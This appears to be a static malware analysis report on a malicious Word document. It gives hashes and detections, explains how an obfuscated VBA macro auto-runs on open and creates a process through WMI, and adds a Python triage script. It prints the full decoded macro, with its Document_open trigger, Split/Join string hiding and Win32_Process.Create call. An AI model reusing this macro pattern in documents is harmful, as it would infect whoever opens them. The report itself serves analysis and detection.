Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b0116bf90ecc8780…

MALICIOUS

Office (OLE)

Size: 183.5 KB
Created: 2019-12-20 12:36:00
Authoring application: Microsoft Office Word
First seen: 2020-07-02
MD5: 9bea55f250669382837d781e3c3311fa
SHA-1: 223be40dfdce231b7132e640ff854a13d79b600a
SHA-256: b0116bf90ecc8780541666fcc71cdbbd062008068a132f9ecec4ab5dcfc8b0b8
Risk score: 172

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Word document carrying an obfuscated VBA macro with a Document_open auto-execution entry point. The obfuscation is name mangling (randomly generated identifiers) combined with junk code: Do While / For loops that never execute, padded with lorem-ipsum string constants and dead arithmetic. The live path is short. Document_open calls Bsszujwlwp, which concatenates string fragments separated by the delimiter "__&888*&^bBGks^@" and then calls Split/Join to remove every occurrence of it. Resolved statically, the result is "winmgmts:Win32_" followed by the text of the Pkcrbfruxqqk TextBox and then "rocess"; the TextBox value is stored in the form rather than in the extracted source, but a single-character value "P" would complete the WMI moniker winmgmts:Win32_Process (inference, not recovered). The macro hands the string to GetObject, builds a second object from the same prefix plus two ControlTipText values and the TextBox text, sets XSize and YSize on it (properties of the Win32_ProcessStartup class), and then calls .Create(...) on the first object with four arguments, matching Win32_Process.Create(CommandLine, CurrentDirectory, ProcessStartupInformation, ProcessId). The command line is assembled in Meqzuwbavz from UserForm control properties (default text, Tag, ControlTipText) that are likewise absent from the extracted source, so process creation via WMI is confirmed but the spawned command is not. ClamAV classifies the document as a generic downloader, which indicates that the hidden command line fetches and runs a second-stage payload; no URL, payload or family could be recovered from the VBA source alone, and the document contains no network indicators.
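As an added example (not part of this report, and not oletools or ClamAV code), the following Python script applies the reasoning above to an excerpt of the extracted macro: it resolves the Split/Join construct statically, checks that the resulting moniker is passed to GetObject and that the handle then receives a .Create call, and scores identifier randomness the way the "identifiers look randomly generated" finding does. The excerpt keeps the macro's live lines and drops the junk loops; the keyword list and the randomness thresholds are this example's own choices, and the TextBox value the macro reads is not in the extracted source, so it stays a placeholder.

```python
"""Static triage of the macro above: resolve the Split/Join string assembly,
confirm the WMI Win32_Process.Create pattern, and score identifier names."""
import re

# Excerpt of the macro shown in this report with the junk Do While/For blocks removed;
# the Pkcrbfruxqqk TextBox text lives in the form, not in the extracted source.
MACRO_EXCERPT = r'''
Private Sub Document_open()
Bsszujwlwp
End Sub
Function Bsszujwlwp()
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
Xshokoctxdop = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&888*&^bB" + "Gks^@n3__&888*&^bBGks^@2___&888*&^bBGks^@" + Zjvhrbpst.Pkcrbfruxqqk + "__&888*&^bBGks^@ro__&888*&^bBGks^@ce__&888*&^bBGks^@ss__&888*&^bBGks^@", iwiwiiwiwjjsj)
Ifixlbcogm = Join(Xshokoctxdop, "")
Set Awrkzofjdwi = GetObject(Ifixlbcogm)
Do While Awrkzofjdwi.Create(KSNNSN & Meqzuwbavz, Tultfjihlr, Bsszujwlwp, Ggpmpnipwvhl)
Loop
End Function
'''

# VBA keywords/builtins excluded from the identifier statistics (example's own list).
VBA_KEYWORDS = {"attribute", "private", "public", "sub", "function", "end", "set", "do",
                "while", "loop", "for", "to", "next", "if", "then", "else", "dim", "as",
                "true", "false", "split", "join", "getobject"}
# string literal ("" escapes a quote) | identifier or member path | punctuation
TOKEN = re.compile(r'"((?:[^"]|"")*)"|([A-Za-z_][\w.]*)|([(),])')

def _call_args(src, name):
    """Argument text of the first name(...) call; parens inside literals are skipped."""
    m = re.search(r"\b" + name + r"\s*\(", src, re.I)
    if not m:
        return None
    depth = 1
    for tok in TOKEN.finditer(src, m.end()):
        depth += {"(": 1, ")": -1}.get(tok.group(3), 0)
        if depth == 0:
            return src[m.end():tok.start()]
    return None

def string_assignments(src):
    """Map simple `Name = "literal"` lines to their values (VBA doubles quotes to escape)."""
    pat = r'^\s*([A-Za-z_]\w*)\s*=\s*"((?:[^"]|"")*)"\s*$'
    return {m.group(1): m.group(2).replace('""', '"') for m in re.finditer(pat, src, re.M)}

def _args(argtext, consts):
    """Evaluate each top-level argument as a concatenation; unknown names become placeholders."""
    args, cur, depth = [], [], 0
    for tok in TOKEN.finditer(argtext):
        lit, name, punct = tok.groups()
        if punct in ("(", ")"):
            depth += 1 if punct == "(" else -1
        elif punct == "," and depth == 0:
            args.append("".join(cur))
            cur = []
        elif lit is not None:
            cur.append(lit.replace('""', '"'))
        elif name is not None:
            cur.append(consts.get(name, f"\x00{name}\x00"))
    args.append("".join(cur))
    return args

def resolve_split_join(src):
    """Join(Split(s, d), "") is s with every d deleted; unresolved names show as <name>."""
    argtext = _call_args(src, "Split")
    if argtext is None:
        return None
    parts = _args(argtext, string_assignments(src))
    if len(parts) < 2 or not parts[1] or "\x00" in parts[1]:
        return None
    return re.sub(r"\x00([^\x00]+)\x00", r"<\1>", parts[0].replace(parts[1], ""))

def wmi_process_spawn(src):
    """True when the moniker is winmgmts:... and its GetObject handle gets .Create()."""
    moniker = resolve_split_join(src)
    if not moniker or not moniker.lower().startswith("winmgmts:"):
        return False
    joined = re.search(r"^\s*(\w+)\s*=\s*Join\s*\(", src, re.M | re.I)
    handles = re.findall(r"GetObject\s*\(\s*(\w+)\s*\)", src, re.I)
    return bool(joined and joined.group(1) in handles and re.search(r"\.Create\s*\(", src, re.I))

def looks_random(name):
    """Name-mangling heuristic: 6+ letters with under 25% vowels or a 4+ consonant run."""
    letters = re.sub(r"[^A-Za-z]", "", name)
    if len(letters) < 6 or name.lower() in VBA_KEYWORDS:
        return False
    vowels = sum(c in "aeiou" for c in letters.lower())
    longest_run = max(len(run) for run in re.split(r"[aeiouAEIOU]", letters))
    return vowels / len(letters) < 0.25 or longest_run >= 4

def random_identifier_ratio(src):
    """Share of distinct identifiers (string literals stripped) that look generated."""
    names = {n for n in re.findall(r"[A-Za-z_]\w*", re.sub(r'"(?:[^"]|"")*"', '""', src))
             if n.lower() not in VBA_KEYWORDS}
    return sum(looks_random(n) for n in names) / len(names) if names else 0.0

if __name__ == "__main__":
    # Prints winmgmts:Win32_<Zjvhrbpst.Pkcrbfruxqqk>rocess; a one-character TextBox
    # value "P" would make it Win32_Process (inference only, the value is not recovered).
    print("moniker:", resolve_split_join(MACRO_EXCERPT))
    print("wmi_process_spawn:", wmi_process_spawn(MACRO_EXCERPT))
    print("random_identifier_ratio:", round(random_identifier_ratio(MACRO_EXCERPT), 2))
```

The delimiter in this sample straddles a "+" boundary ("...&^b" + "BGks^@..."), which is why the script concatenates the literals before deleting the delimiter rather than splitting each literal on its own; a per-fragment approach would leave "winmgmts" broken. Anything the form supplies at runtime (TextBox text, Tag, ControlTipText) has to come from the UserForm stream, which olevba's decoded source does not carry, so the moniker and the command line can only be completed by dumping the form or by running the document in a sandbox.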

Heuristics 7

  • ClamAV: Doc.Downloader.Generic-7469762-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7469762-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Loop
    Set Awrkzofjdwi = GetObject(Ifixlbcogm)
       Ksgkdieuey = 234 + 423
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Control = "Pkcrbfruxqqk, 0, 0, MSForms, TextBox"
    Private Sub Document_open()
       Vsxcsqthpsv = 234 + 423
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML XML namespace URI present in any Office file with drawing content; it is an identifier, not an address the document contacts, and it is not an indicator.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7699 bytes
SHA-256: d0844ef7b32133ef07fde84d5acd81b4b90e55e7250312c6bd74e6c9fcd45973
Detection
ClamAV: No threats found (on the extracted source by itself; the Doc.Downloader.Generic-7469762-0 hit above is on the parent document)
Obfuscation or payload: likely
191 of 322 identifiers look randomly generated (e.g. 'Htvjucopvovvk') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Zjvhrbpst"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Pkcrbfruxqqk, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Vsxcsqthpsv = 234 + 423
   Do While Ulhnztvlka = 1
      Gwngbesmxjx = 3 * Yhzjjyiv
      Pyrazmdlrk = ("Accusantium fugiat facilis commodi.")
      For Ufboncinko = Amvbbcetqj To Jesatyfkn
         Tiulgmccale = ("Adipisci alias ipsam.")
         Qbjpftvkhte = 223
      Next
      Iumicznybt = Ygnhxwfefkr
Loop
Bsszujwlwp
   Elbmdkymoc = 234 + 423
   Do While Bzylxlobrkv = 1
      Gbabwvha = 3 * Vimzgrkdekdx
      Evnnjrup = ("Dolorem dolore corrupti doloribus quia qui.")
      For Wjykrgmmtf = Kmhkghqq To Ozwbitqqzg
         Cxszlyyq = ("Dolorum officia ex.")
         Ybkbgylnz = 223
      Next
      Nuyopyswdgw = Kjrgvsrgfh
Loop
End Sub

Attribute VB_Name = "Qfwdvbgu"
Attribute VB_Base = "0{6040592D-7473-4FA1-A6DF-0842EDC07B88}{B609B1DD-DA11-4B56-9C5F-3FCF55B119A1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Pnzbzthe"
Function Meqzuwbavz()
   Wfibprxaq = 234 + 423
   Do While Nrycciltbbod = 1
      Acqckyhcjbmo = 3 * Affvsliykg
      Vdceicvio = ("Mollitia et repudiandae non.")
      For Yftklhxqn = Tvwslakb To Mddezetkty
         Yhpybxqnqb = ("Ullam inventore rerum.")
         Jhipqvymwwlc = 223
      Next
      Lddfudeiw = Mznlftly
Loop
Jtzutbmrwixdv = Zjvhrbpst.Pkcrbfruxqqk
   Avzrjevtuhn = 234 + 423
   Do While Egxuonuvwh = 1
      Hqllvyalrbwp = 3 * Ddfcbmrib
      Pjgoueou = ("Lester")
      For Njiyingt = Hjjkqptfrc To Hkgpuwwwivp
         Uxdszlpztsf = ("Tenetur est exercitationem veniam modi consectetur consequatur et qui quo.")
         Xfkicteybxstt = 223
      Next
      Gbmuhtwsqnsri = Sapxzrlzsvy
Loop
Vvsrfpwhqplea = Jtzutbmrwixdv + Qfwdvbgu.Tjsfwgoqave + Qfwdvbgu.Jficvhxaze + Qfwdvbgu.Eegbgwkm
   Hzmadwle = 234 + 423
   Do While Yxkucxbyeabn = 1
      Kaykhwxn = 3 * Nkfnvvzidhy
      Lvpfnnsbt = ("Harum soluta commodi.")
      For Qcxbxkvlwt = Sncjasknbnun To Qkzjpugtwtxy
         Mnamfdwrlesi = ("Explicabo ut sunt est sint unde molestiae.")
         Kciklftklnd = 223
      Next
      Zqjlbhrbon = Lvzzuqglp
Loop
Tqralznxyvlm = Vvsrfpwhqplea + Qfwdvbgu.Tacswkkfl + Qfwdvbgu.Fuwkkodvb.Tag
   Nvoqwrhvd = 234 + 423
   Do While Magnjdknxvq = 1
      Fxevkerkxghj = 3 * Ttkbelqjbtlg
      Nplxaukz = ("Minus mollitia et.")
      For Kyadouydhj = Ntmjdwvlkezo To Vkjhjugyr
         Muhuhyvlub = ("Quaerat perspiciatis vel eum veniam totam.")
         Qqodbbgzmh = 223
      Next
      Ntaawmpcgyqbo = Gdcbgdzt
Loop
Meqzuwbavz = Pdjuarjmpsw + Tqralznxyvlm + Pdjuarjmpsw
   Iaksnxnfhszrx = 234 + 423
   Do While Ugrllztrbs = 1
      Qaqsidjt = 3 * Svrmifznysf
      Qmhdyoijzvtwf = ("Ipsam molestiae sit suscipit.")
      For Rnnkqhov = Qosnuayzaafaa To Mdtaxpdpy
         Euzrcqneiz = ("Tempora reiciendis rerum illo.")
         Fvvweqvqncfee = 223
      Next
      Vjnzuqjwdaix = Vcewhnfcsyz
Loop
End Function
Function Bsszujwlwp()
   Whupiiumtthh = 234 + 423
   Do While Rdplwuce = 1
      Idieaejun = 3 * Fwkyqksgkncj
      Xmcmwpsl = ("Laborum molestiae.")
      For Fzqmpkmul = Hfnfkjxltg To Edrhiqtyt
         Trugraah = ("Ralph")
         Nphpgmgvauam = 223
      Next
      Ixdddrkszb = Pcfksyuoqnk
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
   Bfhcxbxio = 234 + 423
   Do While Wtvyxxvtacda = 1
      Hxswohpjjch = 3 * Wlgzwdjfhbg
      Gwzbxeqppd = ("Voluptate similique sapiente maiores.")
      For Zkenjsqdky = Dhxhizvlldas To Fddxhhbnw
         Rxjqhbhoe = ("Natus ullam et.")
         Hihqhsawjld = 223
      Next
      Mzmraspledq = Udctefjpwv
Loop
Xshokoctxdop = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&888*&^bB" + "Gks^@n3__&888*&^bBGks^@2___&888*&^bBGks^@" + Zjvhrbpst.Pkcrbfruxqqk + "__&888*&^bBGks^@ro__&888*&^bBGks^@ce__&888*&^bBGks^@ss__&888*&^bBGks^@", iwiwiiwiwjjsj)
   Qhdhcfmpesnw = 234 + 423
   Do While Yvynddxkdtcqw = 1
      Qtqnvivbd = 3 * Gwmljsqs
      Etpdxfekfli = ("Est nihil impedit.")
      For Oywisqcuua = Bxsjkaezolaak To Rqybtjmy
         Jybnvksngv = ("Elisa")
         Auldxvcxwx = 223
      Next
      Ldvzinpzfxa = Lsbinecu
Loop
Ifixlbcogm = Join(Xshokoctxdop, "")
   Qxfmmbcnz = 234 + 423
   Do While Wihziddzmh = 1
      Wlvovqgusngiq = 3 * Calizgioknfo
      Tvxyyjaqng = ("Doloribus accusamus dolores distinctio.")
      For Gqiczjekbzaz = Nwlaqbbkysij To Tlmelgzrgiov
         Iuuyhgvdfmpv = ("Loretta")
         Sqtqrkqpmwnls = 223
      Next
      Cmvrgceykcl = Fzpqodzpoxd
Loop
Set Awrkzofjdwi = GetObject(Ifixlbcogm)
   Ksgkdieuey = 234 + 423
   Do While Hmhyvrom = 1
      Vytewcna = 3 * Jhcgsshg
      Hjkrkxzkr = ("A aut quidem.")
      For Apkxiqzmbhet = Ajbfcjhensl To Tyddiyji
         Ikbiuhzdqlak = ("Voluptas.")
         Fpxlvcrmuofnx = 223
      Next
      Upiissubanxnp = Bjlextay
Loop
Zauvksyutms = Ifixlbcogm + Qfwdvbgu.Ufdftudwj.ControlTipText + Qfwdvbgu.Ohpgknfpqtfc.ControlTipText
   Usxprgrtqh = 234 + 423
   Do While Axcdxzkymoh = 1
      Heeemjtst = 3 * Hmorrktyjirmt
      Ouqzfkrkjbno = ("Sapiente.")
      For Wxgbfvllthbuj = Psloruycuqmqb To Dwpanklknuk
         Jxlbuoti = ("Sint et quis quae non nulla ullam.")
         Ncxvmltfjfddf = 223
      Next
      Jleixtgrw = Fkwmlhbwcypoy
Loop
Xeawxzmnyjbbu = Zauvksyutms + Zjvhrbpst.Pkcrbfruxqqk
   Drgxgkxrrxd = 234 + 423
   Do While Htvjucopvovvk = 1
      Kujogmaswkjvl = 3 * Ewahitmgcm
      Ickbvpagwnpkj = ("Veniam sapiente aut cum aut dolorum autem consequatur harum.")
      For Yylgdqlj = Dndyohbymspl To Gktnrgpybsn
         Gejwtlgsbwh = ("Dolorum est quia officia quia ducimus aliquam maiores veritatis.")
         Omwoknpwz = 223
      Next
      Ystffmklgpvtd = Adveoleksdbmi
Loop
Set Bsszujwlwp = GetObject(Xeawxzmnyjbbu)
   Cvqnarvfg = 234 + 423
   Do While Cdzoscqdzz = 1
      Pzwzeydhv = 3 * Fgogrhnjc
      Szlpdpogt = ("Placeat consequuntur.")
      For Pbndrrhdrn = Uhdvzwlppukgx To Vnsphavrnsn
         Cztrqbrhzupkh = ("Qui quibusdam sint.")
         Uqhgdblqyyvx = 223
      Next
      Pclgpnqbsqv = Vscfzjcww
Loop
Bsszujwlwp.XSize = False
   Rtwiquvvizuah = 234 + 423
   Do While Zzskzbpaycaw = 1
      Bimjygyeqsc = 3 * Eybswklw
      Chwbtxgpxyfgr = ("Roberto")
      For Imuvjzinakbw = Mktdjjbc To Hjdfnvxht
         Xrbnzutvqrb = ("Modi excepturi.")
         Lomdiyqfip = 223
      Next
      Vcaentcipotsp = Hgnnfnsuzju
Loop
Bsszujwlwp.YSize = False
   Amglweltwv = 234 + 423
   Do While Rzzfnwsz = 1
      Kjycbvhyizk = 3 * Ptxvrykuu
      Kpmoyyqkzjbx = ("Sed sed vel occaecati impedit aut earum iure.")
      For Dqmymytcujlq = Abwquerl To Zkiaovnwkboi
         Hqaiuccixpjym = ("Ut.")
         Hcrhtycq = 223
      Next
      Zwpfynsdbjd = Rgqqmtrqic
Loop
Do While Awrkzofjdwi.Create(KSNNSN & Meqzuwbavz, Tultfjihlr, Bsszujwlwp, Ggpmpnipwvhl)
Loop
   Xvideayuc = 234 + 423
   Do While Btucdtvq = 1
      Paptqonnnfa = 3 * Cyqcqzeunyf
      Rnwhqizsiv = ("Facilis sit nam.")
      For Nmkhpzabds = Qersucbjzf To Qgprawtd
         Dntmxyfshzjk = ("Dolorum aliquam numquam debitis iure esse.")
         Rhxgtjliqk = 223
      Next
      Jibgyapybd = Ecegxwqgp
Loop
End Function